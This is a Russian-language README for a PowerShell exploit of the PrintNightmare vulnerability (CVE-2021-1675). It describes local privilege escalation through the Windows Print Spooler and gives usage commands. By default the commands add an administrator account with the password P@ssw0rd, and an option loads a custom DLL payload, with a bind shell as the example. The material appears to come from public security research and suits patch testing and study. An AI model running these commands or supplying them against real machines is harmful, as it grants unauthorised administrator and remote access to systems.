
PowerShell-эксплойт для CVE-2021-1675 (PrintNightmare), выполняющий локальное повышение привилегий путём добавления пользователя в локальную группу администраторов через Print Spooler.
Caleb Stewart | John Hammond | July 1, 2021
CVE-2021-1675 — это критическая уязвимость удалённого выполнения кода и локального повышения привилегий, получившая название «PrintNightmare».
Для возможности удалённого выполнения кода были опубликованы эксплойты Proof-of-Concept (Python, C++), а для локального повышения привилегий — версия на C#. Мы не видели нативной реализации на чистом PowerShell и захотели попробовать свои силы в доработке и переработке эксплойта.
Этот PowerShell-скрипт выполняет локальное повышение привилегий (LPE) с помощью техники атаки PrintNightmare.

Протестировано на Windows Server 2016 и Windows Server 2019.
По умолчанию добавляет нового пользователя в группу локальных администраторов:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
Укажите собственную DLL-нагрузку, чтобы сделать что-либо ещё.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"